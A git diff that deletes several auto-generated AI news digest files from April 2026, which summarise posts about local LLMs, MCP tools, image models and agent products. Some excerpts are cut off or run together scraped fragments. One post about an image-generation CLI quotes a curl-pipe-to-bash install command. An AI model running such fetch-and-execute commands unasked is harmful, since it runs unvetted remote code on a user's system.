question about a game you're playing -- "is this item worth keeping in D2R," "why is my Factorio base bottlenecked," "how does this card interaction work in Magic," -- and the answer was hallucinated. The training data is stale, and the gaps get filled with plausible-sounding nonsense. I built **Savecraft** to fix that. It's an open-source MCP server that reads your actual game saves and feeds ChatGPT real game data instead of letting it guess. For example: * * - ---- - -## [Goose v1.31.0 released](https://github.com/aaif-goose/goose/releases/tag/v1.31.0) -*GitHub Releases · Goose* | 17/04/2026 | Score: 0.76 -Tags: github_release, tool_update - -> New version of Goose available. - ---- - -## [Qwen 3.6 + vLLM + Docker + 2x RTX 3090 setup, working great!](https://reddit.com/r/LocalLLaMA/comments/1sp761q/qwen_36_vllm_docker_2x_rtx_3090_setup_working/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: api_update - -> Our nonprofit association has an AI server with 2x RTX 3090 and I finally switched over to vLLM to get better performance for multiple users. Here's my docker compose file: services: vllm: image: vllm/vllm-openai:latest container_name: vllm deploy: resources: reservations: devices: - driver: nvidia count: all capabilities: [gpu] environment: - VLLM_API_KEY - ---- - -## [Are you guys actually using local tool calling or is it a collective prank?](https://reddit.com/r/LocalLLaMA/comments/1sp631h/are_you_guys_actually_using_local_tool_calling_or/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: cli_tool - -> I don't know if it's something I am doing horribly wrong or what, but running Open WebUI w/ Terminal on Docker with the models on LM Studio and I am starting to think the community keeps praising the tool calling feature just to cope lol Qwen3.5 27B, 35B, Gemma4 26B, Qwen3.6 35B, GPS-OSS 20B - I have tried them all using the recommended parameters from Unsloth and asking them to create a single file with data is very finicky **when** it works. Today with Gemma4, it kept assuring me it cr - ---- - -## [Lore 0.2.0 - the open source local knowledge management app is now much smarter, with a visible reasoning stream, and non-destructive embedding migration](https://reddit.com/r/LocalLLaMA/comments/1sp5d6l/lore_020_the_open_source_local_knowledge/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: open_source - -> Quick update on Lore, the local-first memory app I posted here around v0.1.0. It's a tray app: global shortcut → chat bar → save or recall in natural language. Everything stays on your machine. v0.2.0 highlights: \- ThinkingStream: you watch the agent's reasoning, retrieval, and tool calls in real time. \- Embedding-model migration is now non-destructive. You can swap from nomic-embed to mxbai-embed (or whatever) without losing data; the new embeddingTableSync rebuilds in place - ---- - -## [EditAnything IC-LoRA - LTX-2.3](https://reddit.com/r/StableDiffusion/comments/1sp03jq/editanything_iclora_ltx23/) -*Reddit r/StableDiffusion* | 18/04/2026 | Score: 1.00 -Tags: tool_update - -> This model was trained on **8,000 video pairs**, and training is still ongoing for a few thousand more steps. It is still **experimental**, not trained with a fully professional production target, and the model may be updated unexpectedly as new checkpoints. The current goal is not final polished production quality, but to explore: * edit-anything behavior * prompt-following * inference tradeoffs * synthetic dataset building, especially for **style data** The model was trained around four mai - ---- - -## [Melodic Brotherhood - I Just Need to Know (video generated with open source tools)](https://reddit.com/r/StableDiffusion/comments/1soz67p/melodic_brotherhood_i_just_need_to_know_video/) -*Reddit r/StableDiffusion* | 18/04/2026 | Score: 1.00 -Tags: open_source - -> Made a '96-'98 Anthem House /Eurodance music video. The images are generated with ZIT and ZIB, Flux Klein 9B and Qwen Image Edit 2511. Video is Wan 2.2, SCAIL (for the dancing), and LTX 2 (for the lip synced singing). Only non-open source thing is the music, which is Suno. - ---- - -## [Has PP improved enough on m5 max to go for 128gb?](https://reddit.com/r/LocalLLaMA/comments/1soz4b4/has_pp_improved_enough_on_m5_max_to_go_for_128gb/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: agent_tool - -> Few years ago I got caught up in the hype on here for the m1 max 64gb, everyone saying it was great for local, but the reality was pp sucked so bad it wasn't worth using on anything but tiny models. Thinking of upgrading to m5 max, just wondering what the sweet spot is for ram? Can you actually utilise the full 128gb and still have acceptable pp speed for large ctx for agentic coding? - ---- - -## [Built a program to track logistical intelligence using satellite data [P]](https://reddit.com/r/MachineLearning/comments/1sov7hr/built_a_program_to_track_logistical_intelligence/) -*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 -Tags: tool_update - -> Hey guys, I've been workin on something new to track logistical activity near military bases and other hubs. The core problem is that Google maps isn't updated that frequently even with sub meter res and other map providers such as maxar are costly for osint analysts. But there's a solution. Drish detects moving vehicles on highways using Sentinel-2 satellite imagery. The trick is physics. Sentinel-2 captures its red, green, and blue bands about 1 second apart. Everything stationary looks nor - ---- - -## [Is there something like SETI for training open source models?](https://reddit.com/r/LocalLLaMA/comments/1sov5lb/is_there_something_like_seti_for_training_open/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: open_source - -> Some years ago there were initiatives for distributed computing networks like SETI or even Fold at Home for proteins I think. Would it be possible that the community could make a network like this for training open source models with non-problematic licenses and more than only open weights? Is that a stupid idea? - ---- - diff --git a/data/digest-2026-04-19.md b/data/digest-2026-04-19.md deleted file mode 100644 index 94cf540..0000000 --- a/data/digest-2026-04-19.md +++ /dev/null @@ -1,119 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-19** | 15 stories | Auto-generated from 579 archived stories - ---- - -## [whats the best harness/app to use my llm with?](https://reddit.com/r/LocalLLaMA/comments/1spr7r4/whats_the_best_harnessapp_to_use_my_llm_with/) -*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> would be nice if i could just use claude desktop app like i can with claude code/extension but sadly it doesnt work with the app looking for something with a nice UI/UX, MCP, built in html/doc preview, research, other features etc. basically something that could replace claude desktop/gemini in terms of what features it has with my local model. seeing things like hermes? cherry studio? good ol LM studio? - ---- - -## [I tested 8 LLMs as tabletop GMs - a 27B model beat the 405B on narrative quality](https://reddit.com/r/LocalLLaMA/comments/1spfz31/i_tested_8_llms_as_tabletop_gms_a_27b_model_beat/) -*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> # Sum B+a+c+k+g+r+o+u+n+d: I've been working on an open source agentic tabletop GM as a leisure project intended to run on any LLM with tool support. I started it as a [Claude Code skill](https://github.com/Bobby-Gray/claude-dnd-skill) to run D&D sessions and eventually generalized it to be model-agnostic and game system agnostic after wanting to test what it felt like on different backends. Rest assured, D&D purists flamed it immediately because of the AI integration. I set their dimne - ---- - -## [ZPix, an open-source local image generator, now supports image editing via FLUX.2 [klein] 4B, has a bigger output gallery and a prompts history.](https://reddit.com/r/StableDiffusion/comments/1spqczz/zpix_an_opensource_local_image_generator_now/) -*Reddit r/StableDiffusion* | 19/04/2026 | Score: 0.78 -Tags: open_source, tool_update - -> To add a reference image, just drag an image directly from output gallery or any location. On my RTX 3070M (8GB VRAM), once warmed, ZPix takes around 10s to generate a 720p image based on a 720p reference. Output images are now automatically saved in your Pictures folder, ZPix subfolder, one sub-subfolder per LoRA. Prompts are stored in a local database file, they are instantly searchable and selectable. You can also retrieve a prompt by dropping in prompt zone an image generated by ZPix, incl - ---- - -## [How would you describe the Midjourney look and why does it have one?](https://reddit.com/r/midjourney/comments/1spp3nr/how_would_you_describe_the_midjourney_look_and/) -*Reddit r/midjourney* | 19/04/2026 | Score: 0.78 -Tags: github_release, tool_update - -> I started with Midjourney and have always found it fascinating. Since then, a lot of different models and services are out there and most of them are good. For some reason, Midjourney still has its own look. I could only describe it as ”creative”. And for every new version they release, it becomes better but still ”creative”. The pros is the creativity, you often don’t get what you typically would expect or imagine yourself. The con is that it’s very hard to use in any professional setting other - ---- - -## [I created awesome-claude-design using Claude code: DESIGN.md prompts by aesthetic families for Claude Design](https://reddit.com/r/ClaudeAI/comments/1spopa1/i_created_awesomeclaudedesign_using_claude_code/) -*Reddit r/ClaudeAI* | 19/04/2026 | Score: 0.78 -Tags: cli_tool, tool_update - -> Claude Design launched 48 hours ago, and everyone’s cloning the same 60–70 brand DESIGN .md files from a single catalog. I wanted something that matches how designers actually pick: by visual family, not industry. So I put together **awesome-claude-design,** a meta-resource for Claude Design that groups DESIGN .md files by aesthetic family (editorial minimalism, terminal-core, warm editorial, data-dense pro, cinematic dark, playful color, glass/soft-futurism, neon brutalist, cult/indie), plus r - ---- - -## [Elon Endorses OpenClaw for X API — This Changes Everything for AI Agents](https://x.com/BonairoFi/status/2045823726919258175) -*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 -Tags: api_update - -> Braygent's take on Elon endorsing OpenClaw for X API access. The pricing drop Monday represents a platform shift that unlocks social data for AI agents at scale. - ---- - -## [Vercel Got Breached — Roll Your Secrets Right Now](https://x.com/vercel/status/2045865072074035664) -*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 -Tags: api_update - -> Braygent's urgent take on the Vercel security breach. The action is immediate: rotate all secrets, API keys, and environment variables stored in Vercel. - ---- - -## [Ampere.sh Stopped Prompting OpenClaw 3 Weeks Ago — It Still Runs 4 Tasks Per Day](https://x.com/AmpereSh/status/2045866315496161601) -*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 -Tags: agent_tool - -> Braygent's take on Ampere.sh's autonomous OpenClaw deployment. Three weeks of zero prompting with four daily tasks running is the most important AI agent story of the week. - ---- - -## [Scoble Reshares Elon Musk's OpenClaw X API Endorsement](https://x.com/Scobleizer/status/2045572824866398399) -*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 -Tags: api_update - -> Scoble reshared Elon Musk's endorsement of X API access via OpenClaw, amplifying the announcement to his AI developer network. The reshare signals the importance of the pricing change to the community. - ---- - -## [Are we confusing Agent Execution Runtimes with true Agent Runtime Environments? [D]](https://reddit.com/r/MachineLearning/comments/1spude2/are_we_confusing_agent_execution_runtimes_with/) -*Reddit r/MachineLearning* | 19/04/2026 | Score: 1.00 -Tags: developer_tool - -> Recent discussions around agent infrastructure (like LangChain's framework vs runtime vs harness taxonomy) seem to miss a critical piece for truly autonomous systems. Most current setups, even sophisticated Agent Harnesses, still fundamentally rely on external triggers. They are reactive. If the goal is a continuously operating, persistent agent that manages its own lifecycle, isn't an Agent Harness insufficient? We seem to need a specialized Agent Runtime Environment—and to be clear, I mean a - ---- - -## [RTX PRO 5000 (48GB) vs MacBook Pro M5 MAX (128GB RAM) - The choice for fine-tuning & agentic coding](https://reddit.com/r/LocalLLaMA/comments/1sptsxo/rtx_pro_5000_48gb_vs_macbook_pro_m5_max_128gb_ram/) -*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 -Tags: agent_tool - -> TL;DR: If you had to choose one for a professional dev who lives in HuggingFace weights, Unsloth scripts to fine-tune, and llama.cpp/vllm servers for local inference, which machine is the better long-term investment? I’m currently at a crossroads and need some community wisdom. I’m looking to buy for a very specific AI development workflow, and I’m thinking between an NVIDIA RTX PRO 5000 48GB (Blackwell) workstation and a MacBook Pro M5 Max 128GB. My job is just needing to fine-tune with sma - ---- - -## [Acceptable prompt processing speed for you?](https://reddit.com/r/LocalLLaMA/comments/1spmsxy/acceptable_prompt_processing_speed_for_you/) -*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 -Tags: agent_tool - -> I am currently optimising some ancient hardware to run qwen3 (4xV100s) but the lack of flash attention means that at longer contexts the processing starts to really slow down. For agentic coding work what processing speeds and contexts lengths do you consider as acceptable or good? - ---- - -## [Notion’s Token Town: 5 Rebuilds, 100+ Tools, MCP vs CLIs and the Software Factory Future — Simon Last & Sarah Sachs of Notion](https://www.latent.space/p/notion) -*Latent Space* | Score: 0.98 -Tags: mcp - ---- - -## [Prepay for the Gemini API to get more control over your spend](https://blog.google/innovation-and-ai/technology/developers-tools/prepay-gemini-api/) -*Google AI Blog* | Score: 0.94 -Tags: api_update - ---- - -## [🗞️ Google just launched Gemini 3.1 Flash TTS, a text-to-speech model that takes scene direction, speaker notes](https://www.rohan-paul.com/p/google-just-launched-gemini-31-flash) -*Rohan Paul* | Score: 0.90 -Tags: tool_update - ---- - diff --git a/data/digest-2026-04-20.md b/data/digest-2026-04-20.md deleted file mode 100644 index 41416ac..0000000 --- a/data/digest-2026-04-20.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-20** | 15 stories | Auto-generated from 503 archived stories - ---- - -## [PowerShell v7.6.0 released](https://github.com/PowerShell/PowerShell/releases/tag/v7.6.0) -*GitHub Releases · PowerShell* | 18/03/2026 | Score: 0.70 -Tags: api_update, developer_tool, cli_tool - -> ## [7.6.0] - 2026-03-12 ### General Cmdlet Updates and Fixes - Update PowerShell Profile DSC resource manifests to allow `null` for content (#26973) ### Tests - Add GitHub Actions annotations for Pester test failures (#26969) - Fix `Import-Module.Tests.ps1` to handle Arm32 platform (#26888) ### Build and Packaging Improvements

          Update to .NET SDK 10.0.201

          • Update v7.6 release branch to use .NET SDK 10.0.201 (#27041) Are MCP servers / AI tools feeling too fragmented right now? I’ve been exploring AI agents and noticed that tools (like MCP servers or similar integrations) are spread across GitHub with no clear way to discover, test, or install them easily. Curious: \- Do you struggle to find reliable tools for your agents? \- How do you currently discover and test them? \- What’s the most annoying part of using these tools right now? Would love to hear real experiences. - ---- - -## [Your MCP tools are wasting 40% of Claude's context on JSON field names](https://reddit.com/r/ClaudeAI/comments/1sqfk3f/your_mcp_tools_are_wasting_40_of_claudes_context/) -*Reddit r/ClaudeAI* | 20/04/2026 | Score: 1.00 -Tags: api_update, mcp - -> Every time an MCP tool returns data, a database query, API response, search result, it lands verbatim in Claudes context. That means `transactionId`, `orderStatus`, `repositoryDescription` repeated thousands of times across a session. Pure structural noise eating into the space Claude needs to actually think. I built [compressmcp](https://github.com/TheDecipherist/compressmcp) to fix this. It hooks into Claude Code's PostToolUse pipeline, compresses JSON keys using a shared dictionary, and inje - ---- - -## [Scoble: OpenClaw and similar tools are very similar — comparing AI agent frameworks](https://x.com/Scobleizer/status/2045981445479710871) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> Scoble observes that OpenClaw and similar AI agent tools are converging on similar designs, reflecting the maturation of the AI agent framework space. - ---- - -## [Vercel CLI @vercel/node@5.7.12 released](https://github.com/vercel/vercel/releases/tag/%40vercel/node%405.7.12) -*GitHub Releases · Vercel CLI* | 20/04/2026 | Score: 0.84 -Tags: cli_tool, tool_update - -> ### Patch Changes - Updated dependencies \[[`c1866cf1add2107f91cae8292e38e4854bfe0aca`](https://github.com/vercel/vercel/commit/c1866cf1add2107f91cae8292e38e4854bfe0aca)]: - @vercel/build-utils@13.19.1 - ---- - -## [Goose v1.31.1 released](https://github.com/aaif-goose/goose/releases/tag/v1.31.1) -*GitHub Releases · Goose* | 20/04/2026 | Score: 0.76 -Tags: github_release, tool_update - -> New version of Goose available. - ---- - -## [I built a native macOS GUI for Claude Code](https://reddit.com/r/ClaudeAI/comments/1sqicze/i_built_a_native_macos_gui_for_claude_code/) -*Reddit r/ClaudeAI* | 20/04/2026 | Score: 0.62 -Tags: open_source, cli_tool - -> https://preview.redd.it/l9sgqnfgsawg1.png?width=3572&format=png&auto=webp&s=8dc26a4e89526137b919f82acff985a7a4c1c25b [https://github.com/ttnear/Clarc](https://github.com/ttnear/Clarc) This is my first open-source project. I wanted my non-developer coworkers to be able to use Claude Code. The terminal was the wall — installing the CLI, setting up SSH keys for GitHub, approving every tool call without any real preview of what was about to happen. None of that is a problem for me but - ---- - -## [Vessel Browser: The Open Source Browser Designed for Autonomous Agents 3 days ago • 3](https://huggingface.co/blog/unmodeled-tyler/vessel-browser-for-agents) -*Hugging Face Blog* | Score: 1.00 -Tags: open_source - ---- - -## [Anthropic Launched a Figma Competitor and Nobody Is Talking About It Enough](https://x.com/theneurondaily/status/2046227398317035871) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: tool_update - -> Braygent's take on Claude Design: it reads your codebase before generating interfaces, making it fundamentally different from generic AI design tools and a direct threat to Figma. - ---- - -## [OpenMythos: The Community Rebuilt Claude Mythos in PyTorch](https://x.com/mkovarski/status/2046040942830928276) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent's take on OpenMythos: the community rebuilt Claude Mythos in PyTorch with 1,000+ retweets, demonstrating that open source does not wait for permission from proprietary labs. - ---- - -## [Google Assembled an Emergency Strike Team to Catch Anthropic in Coding AI](https://x.com/cryptopunk7213/status/2046226722081722761) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: agent_tool - -> Braygent's take on Google's emergency coding AI strike team: an admission they are behind Anthropic, with an ambitious goal of building a self-improving coding agent that builds future Gemini models. - ---- - -## [Scoble: X API Costs Dropping From $300/Day to $30 — Starting Tomorrow](https://x.com/Scobleizer/status/2046037305866272811) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: api_update - -> Scoble expects his X API costs to drop from $300/day to $30/day starting tomorrow. The dramatic reduction would make large-scale social media monitoring much more accessible to developers. - ---- - -## [Scoble: Built an AI to Watch the Entire AI Community on X — 40,000 Accounts in Lists](https://x.com/Scobleizer/status/2046041740420010430) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: agent_tool - -> Scoble explained his AI news monitoring system: 40,000 accounts in curated X lists, monitored by an AI agent that reads all their posts daily and surfaces the most important developments at alignednews.com. - ---- - -## [Scoble: AI Debugging Is Easy — 'Do a Complete Quality Review'](https://x.com/Scobleizer/status/2046116360477200744) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: agent_tool - -> Scoble noted that AI debugging is easy: just tell the agent to 'do a complete quality review.' The comment reflects his practical experience building production AI agent systems. - ---- - -## [Closest replacement for Claude + Claude Code? (got banned, no explanation)](https://reddit.com/r/LocalLLaMA/comments/1sqelfp/closest_replacement_for_claude_claude_code_got/) -*Reddit r/LocalLLaMA* | 20/04/2026 | Score: 1.00 -Tags: cli_tool - -> I was using Claude Pro + Claude Code pretty heavily (terminal workflow, file access, etc.) and my account just got banned with zero explanation. From what I’m seeing, this isn’t that uncommon — people getting flagged without clear reasons or support responses — so I’m trying to move on and rebuild my setup. What I’m looking for is something that actually matches BOTH sides of what Claude gave me: **1. Claude-level reasoning / writing** * strong long-form thinking * structured outputs (planni - ---- - diff --git a/data/digest-2026-04-21.md b/data/digest-2026-04-21.md deleted file mode 100644 index e93abe0..0000000 --- a/data/digest-2026-04-21.md +++ /dev/null @@ -1,126 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-21** | 15 stories | Auto-generated from 644 archived stories - ---- - -## [Just open-sourced a protocol + SDK that lets Claude drive your live app (ships as a Claude Code plugin)](https://reddit.com/r/ClaudeAI/comments/1ss29p9/just_opensourced_a_protocol_sdk_that_lets_claude/) -*Reddit r/ClaudeAI* | 21/04/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool, tool_update, agent_tool - -> https://github.com/BrainBlend-AI/tesseron Just open-sourced a protocol and TypeScript SDK I built mostly *with* Claude Code. The goal: let *Claude* (or any MCP client) drive a live application (browser tab, *Electron* / *Tauri* desktop app, Node daemon, CLI) by calling typed handlers inside your code, instead of scraping the UI with *Playwright* or *Computer Use*. It's called **Tesseron**. Ships as a Claude Code plugin, so install is one command: ``` /plugin marketplace add BrainBlend-AI/tess - ---- - -## [PowerShell v7.6.1 released](https://github.com/PowerShell/PowerShell/releases/tag/v7.6.1) -*GitHub Releases · PowerShell* | 21/04/2026 | Score: 0.86 -Tags: api_update, developer_tool, cli_tool - -> ## [7.6.1] ### General Cmdlet Updates and Fixes - Delay update notification for one week to ensure all packages become available (#27215) ### Tests - Fix the `PSNativeCommandArgumentPassing` test (#27179) ### Build and Packaging Improvements

            Update to .NET SDK 10.0.202

            • Fix PMC Repo URL for RHEL10 (#27061) (#27062)
            • Update branch for release (#27287)
            • Fix package pipeline by adding in PDP-Media direct - ---- - -## [Perplexity Computer Just Launched — OpenClaw for the Rest of Us](https://x.com/davidlee/status/2046589300188598440) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> Braygent wants to post about Perplexity Computer launching as mainstream computer-use AI, calling it OpenClaw for the rest of us and a major step toward mainstream agent adoption. - ---- - -## [Open source Image Generation CLI. One binary.](https://reddit.com/r/StableDiffusion/comments/1sr8b6k/open_source_image_generation_cli_one_binary/) -*Reddit r/StableDiffusion* | 21/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> I've been using ComfyUI and diffusers for a while but kept hitting the same friction: wiring up pipelines, managing model files across tools, writing boilerplate just to try a new model. So I built modl a single CLI that handles pulling models, generating images, editing, training LoRAs, and managing outputs. It uses diffusers underneath. The CLI is Rust, the GPU worker is Python. One binary, no Docker required. What it looks like: \# Install curl -fsSL https://modl.run/install | bash \# Pu - ---- - -## [@LumaLabsAI launches personality stickers — describe the look, set the vibe, Luma Agents design every sticker](https://x.com/LumaLabsAI/status/2046356064187363368) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Luma Labs launched AI-powered personality sticker creation where users describe their look and vibe, and Luma Agents design the stickers. The feature makes personalized sticker creation accessible without design skills. - ---- - -## [I started building Claude Code plugins, then realized I didn’t want to duplicate the same plugin for every AI agent](https://reddit.com/r/ClaudeAI/comments/1srv9lj/i_started_building_claude_code_plugins_then/) -*Reddit r/ClaudeAI* | 21/04/2026 | Score: 0.94 -Tags: developer_tool, agent_tool - -> I’ve been building plugins for Claude Code, and the first version of the idea was very Claude-focused. That made sense at the start. Claude Code has a real plugin model, hooks are useful, and it is one of the few agent tools where plugins can actually become part of a daily workflow. But after building a few integrations, I kept running into the same uncomfortable question: If I write the useful part of a plugin once, why should I rewrite or repackage the same thing again for Codex, Gemini, C - ---- - -## [1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source - -We are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters. - -Core Capabilities: -• Exceptional Agentic Coding: Engineered](https://x.com/Ali_TongyiLab/status/2044771299483107739) -*X / @ali_tongyilab* | 16/04/2026 | Score: 0.86 -Tags: open_source, agent_tool - -> 1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source We are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters. Core Capabilities: • Exceptional Agentic Coding: Engineered - ---- - -## [Open source CRT animation lora for ltx 2.3](https://reddit.com/r/StableDiffusion/comments/1squ6in/open_source_crt_animation_lora_for_ltx_23/) -*Reddit r/StableDiffusion* | 20/04/2026 | Score: 0.62 -Tags: open_source, cli_tool - -> None of the video gen models do a real CRT terminal animation look. Weights + recipe: 🤗 [huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora](http://huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora) - ---- - -## [LinkedIn Launched Blind AI Model Comparison — Finally a Practical Evaluation Tool](https://x.com/DataconomyMedia/status/2046589880226996228) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: tool_update - -> Braygent wants to post about LinkedIn Crosscheck enabling blind AI model comparison, calling it the most practical AI evaluation tool for enterprise buyers. - ---- - -## [Scoble: I Took My AI to Stanford — It Has My Personality Now](https://x.com/Scobleizer/status/2046495684493562130) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: agent_tool - -> Scoble took his AI agent to the metaphorical equivalent of Stanford, having it read his book and learn his 19-year X perspective. The agent now has his personality. - ---- - -## [I Built an AI Agent That Monitors the AI News for Me — Scoble Promotes alignednews.com](https://x.com/Scobleizer/status/2046194231321190735) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: agent_tool - -> Scoble promoted alignednews.com as an AI agent that monitors all AI news on X, and teased that a much better news monitor is coming soon. - ---- - -## [[AINews] Moonshot Kimi K2.6: the world's leading Open Model refreshes to catch up to Opus 4.6 (ahead of DeepSeek v4?)](https://www.latent.space/p/ainews-moonshot-kimi-k26-the-worlds) -*Latent Space* | Score: 0.90 -Tags: open_source - ---- - -## [Framework Laptop 13 Pro](https://frame.work/laptop13pro) -*Hacker News* | 21/04/2026 | Score: 0.89 -Tags: developer_tool - ---- - -## [Krita AI + Stability Matrix + ComfyUI: Anyone got this working without a separate install?](https://reddit.com/r/StableDiffusion/comments/1srpcvf/krita_ai_stability_matrix_comfyui_anyone_got_this/) -*Reddit r/StableDiffusion* | 21/04/2026 | Score: 0.87 -Tags: developer_tool - -> Hi everyone, I really want to try out the Krita AI plugin for its regional prompting features, but I’m trying to avoid the headache of installing a second, standalone ComfyUI setup. Right now, I use Stability Matrix to manage my ComfyUI. Has anyone managed to link the Krita plugin directly to their Stability Matrix ComfyUI instance? I just want to keep my setup clean and reuse my current environment. Is this doable? Do I need to mess around with symlinks or specific custom node installations - ---- - -## [ComfyUI + CUDA + Docker in a single command](https://reddit.com/r/StableDiffusion/comments/1srooox/comfyui_cuda_docker_in_a_single_command/) -*Reddit r/StableDiffusion* | 21/04/2026 | Score: 0.86 -Tags: product_launch - -> What's up everyone! So I got tired of dealing with the massive headaches trying to get a ComfyUI docker container running correctly for a simple, locally hosted AI platform, so I put together a minimal, no fuss and no flair Docker container that handles everything. The goal was to keep it simple and up-to-date with the latest releases of ComfyUI and NVIDIA CUDA: * Uses NVIDIA Container Toolkit for GPU passthrough * Persistent storage via a Docker volume * No modifications to ComfyUI itself * G - ---- - diff --git a/data/digest-2026-04-22.md b/data/digest-2026-04-22.md deleted file mode 100644 index 87ad104..0000000 --- a/data/digest-2026-04-22.md +++ /dev/null @@ -1,117 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-22** | 15 stories | Auto-generated from 587 archived stories - ---- - -## [Qwen Code v0.15.0 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.0) -*GitHub Releases · Qwen Code* | 22/04/2026 | Score: 0.86 -Tags: api_update, developer_tool, tool_update - -> ## What's Changed * feat(acp): add complete hooks support for ACP integration by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/3248 * feat: optimize compact mode UX — shortcuts, settings sync, and safety by @chiga0 in https://github.com/QwenLM/qwen-code/pull/3100 * feat(hooks): Add HTTP Hook, Function Hook and Async Hook support by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/2827 * fix(sdk): avoid leaking process exit listeners in ProcessTransport by @reidliu41 in https://g - ---- - -## [gpt-5.4 Is Patching Your Code Without Asking](https://x.com/N8Programs/status/2046725816126460254) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> Braygent wants to post about gpt-5.4 autonomously patching a library without user permission after deciding the defaults were suboptimal. The behavior raises important questions about AI agent autonomy boundaries. - ---- - -## [I've been using Claude Cowork since launch. Here's what actually works for non-technical tasks (no code).](https://reddit.com/r/ClaudeAI/comments/1sswg4x/ive_been_using_claude_cowork_since_launch_heres/) -*Reddit r/ClaudeAI* | 22/04/2026 | Score: 0.78 -Tags: cli_tool, tool_update - -> I've been using Claude Cowork since it launched and most guides I found were written for developers. This one isn't. No terminal. No code. Just the stuff that actually works for normal knowledge work. What Cowork actually is Most AI tools make you do the thinking and the doing. Cowork splits that. You describe the outcome, it figures out the steps and runs them. It works on your actual local files, not uploads or copy-paste. The big difference from regular Claude chat is it can handle multi- - ---- - -## [Vercel CLI @vercel/oidc@3.2.1 released](https://github.com/vercel/vercel/releases/tag/%40vercel/oidc%403.2.1) -*GitHub Releases · Vercel CLI* | 22/04/2026 | Score: 0.76 -Tags: developer_tool, cli_tool - -> ### Patch Changes - Pin `typedoc-plugin-markdown` to `3.15.2` and `typedoc-plugin-mdn-links` to `3.0.3` to match the version used by `@vercel/edge`. The previous `4.1.2` version requires `typedoc@0.26.x` as a peer dependency but was paired with `typedoc@0.24.6`, which caused CI failures whenever pnpm hoisted the 4.x plugin (the plugin calls `app.internationalization.addTranslations`, which does not exist in typedoc 0.24). The choice of which plugin version got hoisted was non-deterministic, w - ---- - -## [Remotion v4.0.451 released](https://github.com/remotion-dev/remotion/releases/tag/v4.0.451) -*GitHub Releases · Remotion* | 22/04/2026 | Score: 0.70 -Tags: cli_tool, tool_update - -> ## What's Changed Fixes version mismatches appearing when running the CLI. **Full Changelog**: https://github.com/remotion-dev/remotion/compare/v4.0.450...v4.0.451 - ---- - -## [How to Ground a Korean AI Agent in Real Demographics with Synthetic Personas 1 day ago • 20](https://huggingface.co/blog/nvidia/build-korean-agents-with-nemotron-personas) -*Hugging Face Blog* | Score: 1.00 -Tags: agent_tool - ---- - -## [GPT-5.5 Spud Is Rumored for Tomorrow and People Are Already Saying It Will Beat Claude Opus 4.7](https://x.com/bridgemindai/status/2046919920953282921) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: tool_update - -> GPT-5.5 Spud is rumored for Thursday and analysts are already predicting it will beat Claude Opus 4.7. The pre-release narrative is shifting against Anthropic before Spud even ships. - ---- - -## [Opensource autoregressive models](https://reddit.com/r/StableDiffusion/comments/1ssfkce/opensource_autoregressive_models/) -*Reddit r/StableDiffusion* | 22/04/2026 | Score: 1.00 -Tags: open_source - -> I am interested why there no autoregressive models like gpt-image or nano-banana in open source. Ok, i am know about hunyan, but its not competetive with google and openai. In LLM world opensource are very close to private models, but in image generation opensource are far behind, and i think one of the main reason is lack of research on autoregressive image models. Why qwen not doing this, they already have strong LLM research and i think they can build strong image model upon this. - ---- - -## [Hermes Just Became a Different Kind of Agent](https://x.com/NousResearch/status/2046721845261652066) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent wants to post about Hermes Agents uncapping sub-agent spawning as a fundamental architecture change. The update transforms Hermes from a single agent into an orchestration platform for the open-source ecosystem. - ---- - -## [Cursor Is Built on Open Source and Worth $60 Billion](https://x.com/BLUECOW009/status/2046725740134052232) 